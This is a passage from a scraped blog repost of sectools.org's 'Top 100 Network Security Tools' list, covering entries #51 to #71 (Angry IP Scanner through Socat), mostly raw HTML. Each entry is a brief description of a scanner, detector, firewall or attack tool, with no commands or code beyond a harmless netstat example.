src="http://mirror.sectools.org/logos/mbsa-30x30.png" align="right" border="0" width="30" height="30" /></a> <a href="http://www.microsoft.com/technet/security/tools/mbsahome.mspx">MBSA</a> : Microsoft Baseline Security Analyzer<br />Microsoft Baseline Security Analyzer (MBSA) is an easy-to-use tool designed for the IT professional that helps small and medium-sized businesses determine their security state in accordance with Microsoft security recommendations and offers specific remediation guidance. Built on the Windows Update Agent and Microsoft Update infrastructure, MBSA ensures consistency with other Microsoft management products including Microsoft Update (MU), Windows Server Update Services (WSUS), Systems Management Server (SMS) and Microsoft Operations Manager (MOM). Apparently MBSA on average scans over 3 million computers each week. <p>See all <a href="http://sectools.org/vuln-scanners.html">vulnerability scanners</a> </p></td></tr></tbody></table>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-41917004011451071442009-07-29T05:26:00.001-07:002009-07-29T05:26:35.758-07:00Top 100 Network Security Tools 51-75<table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#51</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.angryziber.com/ipscan/"><img src="http://mirror.sectools.org/logos/angry-64x64.png" align="right" border="0" width="64" height="64" /></a> <a href="http://www.angryziber.com/ipscan/">Angry IP Scanner</a> : IP address and port scanner<br />Angry IP Scanner is a small open source Java application which performs host discovery ("ping scan") and port scans. The old 2.x release was Windows-only, but the new 3.X series runs on Linux, Mac, or Windows as long as Java is installed. Version 3.X omits the <a href="http://sectools.org/images/zebra_page.gif">vampire zebra logo</a>. As with all connect()-based scanners, performance on Windows XP SP2 and Vista can be poor due to limitations added to tcpip.sys. The <a href="http://www.angryziber.com/w/FAQ:_Crippled_Windows">Angry FAQ</a> provides details and workarounds. A <a href="http://seclists.org/nmap-dev/2008/q2/0608.html">short review</a> was posted to nmap-dev. <p>See all <a href="http://sectools.org/port-scanners.html">port scanners</a> </p></td></tr></tbody></table><hr /><a name="rkhunter"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#52</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.rootkit.nl/projects/rootkit_hunter.html"><img src="http://mirror.sectools.org/logos/rkhunter-76x54.png" align="right" border="0" width="76" height="54" /></a> <a href="http://www.rootkit.nl/projects/rootkit_hunter.html">RKHunter</a> : An Unix Rootkit Detector<br />RKHunter is scanning tool that checks for signs of various pieces of nasty software on your system like rootkits, backdoors and local exploits. It runs many tests, including MD5 hash comparisons, default filenames used by rootkits, wrong file permissions for binaries, and suspicious strings in LKM and KLD modules. <p>See all <a href="http://sectools.org/rootkit-detectors.html">rootkit detectors</a> </p></td></tr></tbody></table><hr /><a name="ike-scan"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#53</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.nta-monitor.com/tools/ike-scan/"><img src="http://mirror.sectools.org/logos/ike-scan-80x50.png" align="right" border="0" width="80" height="50" /></a> <a href="http://www.nta-monitor.com/tools/ike-scan/">Ike-scan</a> : VPN detector/scanner<br />Ike-scan exploits transport characteristics in the Internet Key Exchange (IKE) service, the mechanism used by VPNs to establish a connection between a server and a remote client. It scans IP addresses for VPN servers by sending a specially crafted IKE packet to each host within a network. Most hosts running IKE will respond, identifying their presence. The tool then remains silent and monitors retransmission packets. These retransmission responses are recorded, displayed and matched against a known set of VPN product fingerprints. Ike-scan can VPNs from manufacturers including Checkpoint, Cisco, Microsoft, Nortel, and Watchguard. <p>See all <a href="http://sectools.org/app-scanners.html">application-specific scanners</a> </p></td></tr></tbody></table><hr /><a name="arpwatch"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#54</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">21</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www-nrg.ee.lbl.gov/">Arpwatch</a> : Keeps track of ethernet/IP address pairings and can detect certain <a href="http://sectools.org/tools3.html#dsniff">monkey business</a><br />Arpwatch is the classic ARP man-in-the-middle attack detector from LBNL's Network Research Group. It syslogs activity and reports certain changes via email. Arpwatch uses LibPcap to listen for ARP packets on a local ethernet interface. </td></tr></tbody></table><hr /><a name="kismac"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#55</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://kismac.de/"><img src="http://mirror.sectools.org/logos/kismac-80x80.png" align="right" border="0" width="80" height="80" /></a> <a href="http://kismac.de/">KisMAC</a> : A A GUI passive wireless stumbler for Mac OS X<br />This popular stumbler for Mac OS X offers many of the features of its namesake <a href="http://sectools.org/index.html#kismet">Kismet</a>, though the codebase is entirely different. Unlike console-based Kismet, KisMAC offers a pretty GUI and was around before Kismet was ported to OS X. It also offers mapping, Pcap-format import and logging, and even some decryption and deauthentication attacks. <p>See all <a href="http://sectools.org/wireless.html">wireless tools</a>, and <a href="http://sectools.org/sniffers.html">packet sniffers</a> </p></td></tr></tbody></table><hr /><a name="ossec"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#56</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.ossec.net/">OSSEC HIDS</a> : An Open Source Host-based Intrusion Detection System<br />OSSEC HIDS performs log analysis, integrity checking, rootkit detection, time-based alerting and active response. In addition to its IDS functionality, it is commonly used as a SEM/SIM solution. Because of its powerful log analysis engine, ISPs, universities and data centers are running OSSEC HIDS to monitor and analyze their firewalls, IDSs, web servers and authentication logs. <p>See all <a href="http://sectools.org/ids.html">intrusion detection systems</a> </p></td></tr></tbody></table><hr /><a name="openbsd-pf"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#57</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">4</span><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.benzedrine.cx/pf.html">Openbsd PF</a> : The OpenBSD Packet Filter<br />Like <a href="http://sectools.org/index.html#netfilter">Netfilter</a> and <a href="http://sectools.org/tools4.html#ipfilter">IP Filter</a> on other platforms, OpenBSD users love PF, their firewall tool. It handles network address translation, normalizing TCP/IP traffic, providing bandwidth control, and packet prioritization. It also offers some eccentric features, such as passive OS detection. Coming from the same guys who created OpenBSD, you can trust that it has been well audited and coded to avoid the sort of security holes we have seen in <a href="http://www3.ca.com/securityadvisor/vulninfo/Vuln.aspx?ID=28350">other</a> <a href="http://netfilter.org/security/">packet</a> <a href="http://www.osvdb.org/displayvuln.php?osvdb_id=4745">filters</a>. <p>See all <a href="http://sectools.org/firewalls.html">firewalls</a> </p></td></tr></tbody></table><hr /><a name="nemesis"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#58</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">18</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.packetfactory.net/projects/nemesis/">Nemesis</a> : Packet injection simplified<br />The Nemesis Project is designed to be a commandline-based, portable human IP stack for UNIX/Linux (and now Windows!). The suite is broken down by protocol, and should allow for useful scripting of injected packet streams from simple shell scripts. If you enjoy Nemesis, you might also want to look at <a href="http://sectools.org/index.html#hping">Hping2</a> as they complement each other well. <p>See all <a href="http://sectools.org/packet-crafters.html">packet crafting tools</a> </p></td></tr></tbody></table><hr /><a name="tor"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#59</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://tor.eff.org/"><img src="http://mirror.sectools.org/logos/tor-80x50.png" align="right" border="0" width="80" height="50" /></a> <a href="http://tor.eff.org/">Tor</a> : An anonymous Internet communication system<br />Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, irc, ssh, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features. For a free cross-platform GUI, users recommend <a href="http://www.vidalia-project.net/">Vidalia</a> <p>See all <a href="http://sectools.org/crypto.html">encryption tools</a> </p></td></tr></tbody></table><hr /><a name="knoppix"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#60</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.knoppix.org/"><img src="http://mirror.sectools.org/logos/knoppix-80x84.png" align="right" border="0" width="80" height="84" /></a> <a href="http://www.knoppix.org/">Knoppix</a> : A general-purpose bootable live system on CD or DVD<br />Knoppix consists of a representative collection of GNU/Linux software, automatic hardware detection, and support for many graphics cards, sound cards, SCSI and USB devices and other peripherals. KNOPPIX can be used as a productive Linux system for the desktop, educational CD, rescue system, or as many nmap survey takers attest, a portable security tool. For a security-specific Linux distribution see <a href="http://sectools.org/tools2.html#backtrack">BackTrack</a>. <p>See all <a href="http://sectools.org/sec-distros.html">security-oriented operating systems</a> </p></td></tr></tbody></table><hr /><a name="iss"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#61</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">47</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.iss.net/products_services/enterprise_protection/vulnerability_assessment/scanner_internet.php"><img src="http://mirror.sectools.org/logos/iss-100x101.gif" align="right" border="0" width="100" height="101" /></a> <a href="http://www.iss.net/products_services/enterprise_protection/vulnerability_assessment/scanner_internet.php">ISS Internet Scanner</a> : Application-level vulnerability assessment<br />Internet Scanner started off in '92 as a tiny open source scanner by Christopher Klaus. Now he has grown ISS into a billion-dollar company with a myriad of security products. <p>See all <a href="http://sectools.org/vuln-scanners.html">vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="fport"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#62</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">39</span><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.foundstone.com/knowledge/proddesc/fport.html">Fport</a> : Foundstone's enhanced netstat<br />Fport reports all open TCP/IP and UDP ports on the machine you run it on and shows what application opened each port. So it can be used to quickly identify unknown open ports and their associated applications. It only runs on Windows, but many UNIX systems now provided this information via netstat (try 'netstat -pan' on Linux). Here is a PDF-Format <a href="http://www.giac.org/practical/gsec/Teena_Henson_GSEC.pdf">SANS article</a> on using Fport and analyzing the results. </td></tr></tbody></table><hr /><a name="chkrootkit"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#63</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.chkrootkit.org/"><img src="http://mirror.sectools.org/logos/chkrootkit-80x135.png" align="right" border="0" width="80" height="135" /></a> <a href="http://www.chkrootkit.org/">chkrootkit</a> : Locally checks for signs of a rootkit<br />chkrootkit is a flexible, portable tool that can check for many signs of rootkit intrusion on Unix-based systems. Its features include detecting binary modification, utmp/wtmp/lastlog modifications, promiscuous interfaces, and malicious kernel modules. <p>See all <a href="http://sectools.org/rootkit-detectors.html">rootkit detectors</a> </p></td></tr></tbody></table><hr /><a name="spike"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#64</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">15</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.immunitysec.com/resources-freesoftware.shtml"><img src="http://mirror.sectools.org/logos/spike-80x26.png" align="right" border="0" width="80" height="26" /></a> <a href="http://www.immunitysec.com/resources-freesoftware.shtml">SPIKE Proxy</a> : HTTP Hacking<br />Spike Proxy is an open source HTTP proxy for finding security flaws in web sites. It is part of the <a href="http://www.immunitysec.com/resources-freesoftware.shtml">Spike Application Testing Suite</a> and supports automated SQL injection detection, web site crawling, login form brute forcing, overflow detection, and directory traversal detection. <p>See all <a href="http://sectools.org/app-scanners.html">application-specific scanners</a> </p></td></tr></tbody></table><hr /><a name="openbsd"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#65</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">14</span><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.openbsd.org/"><img src="http://mirror.sectools.org/logos/openbsd-87x81.gif" align="right" border="0" width="87" height="81" /></a> <a href="http://www.openbsd.org/">OpenBSD</a> : The Proactively Secure Operating System<br />OpenBSD is one of the only operating systems to treat security as their very highest priority. Even higher than usability in some cases. But their enviable security record speaks for itself. They also focus on stability and fight to obtain documentation for the hardware they wish to support. Perhaps their greatest achievement was creating <a href="http://www.openssh.org/">OpenSSH</a>. OpenBSD users also love [pf], their firewall tool. <p>See all <a href="http://sectools.org/sec-distros.html">security-oriented operating systems</a> </p></td></tr></tbody></table><hr /><a name="yersinia"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#66</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.yersinia.net/"><img src="http://mirror.sectools.org/logos/yersinia-80x49.png" align="right" border="0" width="80" height="49" /></a> <a href="http://www.yersinia.net/">Yersinia</a> : A multi-protocol low-level attack tool<br />Yersinia is a low-level protocol attack tool useful for penetration testing. It is capable of many diverse attacks over multiple protocols, such as becoming the root role in the Spanning Tree (Spanning Tree Protocol), creating virtual CDP (Cisco Discovery Protocol) neighbors, becoming the active router in a HSRP (Hot Standby Router Protocol) scenario, faking DHCP replies, and other low-level attacks. <p>See all <a href="http://sectools.org/packet-crafters.html">packet crafting tools</a> </p></td></tr></tbody></table><hr /><a name="nagios"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#67</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.nagios.org/"><img src="http://mirror.sectools.org/logos/nagios-80x21.png" align="right" border="0" width="80" height="21" /></a> <a href="http://www.nagios.org/">Nagios</a> : An open source host, service and network monitoring program<br />Nagios is a system and network monitoring application. It watches hosts and services that you specify, alerting you when things go bad and when they get better. Some of its many features include monitoring of network services (smtp, pop3, http, nntp, ping, etc.), monitoring of host resources (processor load, disk usage, etc.), and contact notifications when service or host problems occur and get resolved (via email, pager, or user-defined method). <p>See all <a href="http://sectools.org/traffic-monitors.html">traffic monitoring tools</a> </p></td></tr></tbody></table><hr /><a name="fragroute"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#68</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">20</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.monkey.org/%7Edugsong/fragroute/">Fragroute</a>/<a href="http://www.packetstormsecurity.nl/UNIX/IDS/nidsbench/fragrouter.html">Fragrouter</a> : A network intrusion detection evasion toolkit<br />Fragrouter is a one-way fragmenting router - IP packets get sent from the attacker to the Fragrouter, which transforms them into a fragmented data stream to forward to the victim. Many network IDS are unable or simply don't bother to reconstruct a coherent view of the network data (via IP fragmentation and TCP stream reassembly), as discussed in <a href="http://insecure.org/stf/secnet_ids/secnet_ids.html">this classic paper</a>. Fragrouter helps an attacker launch IP-based attacks while avoiding detection. It is part of the <a href="http://www.packetstormsecurity.nl/UNIX/IDS/nidsbench/nidsbench.html">NIDSbench</a> suite of tools by Dug Song. Fragroute is a similar tool which is also by Dug Song. <p>See all <a href="http://sectools.org/ids.html">intrusion detection systems</a> </p></td></tr></tbody></table><hr /><a name="x-scan"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#69</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.xfocus.net/tools/200507/1057.html">X-scan</a> : A general scanner for scanning network vulnerabilities<br />A multi-threaded, plug-in-supported vulnerability scanner. X-Scan includes many features, including full NASL support, detecting service types, remote OS type/version detection, weak user/password pairs, and more. You may be able to find newer versions available <a href="http://www.xfocus.net/tools/">here</a> if you can deal with most of the page being written in Chinese. <p>See all <a href="http://sectools.org/vuln-scanners.html">vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="whisker-libwhisker"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#70</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">60</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.wiretrip.net/rfp/">Whisker/libwhisker</a> : Rain.Forest.Puppy's CGI vulnerability scanner and library<br />Libwhisker is a Perl module geared geared towards HTTP testing. It provides functions for testing HTTP servers for many known security holes, particularly the presence of dangerous CGIs. Whisker is a scanner that used libwhisker but is now deprecated in favor of <a href="http://sectools.org/index.html#nikto">Nikto</a> which also uses libwhisker. <p>See all <a href="http://sectools.org/web-scanners.html">web vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="socat"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#71</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.dest-unreach.org/socat/">Socat</a> : A relay for bidirectional data transfer<br />A utility similar to the venerable <a 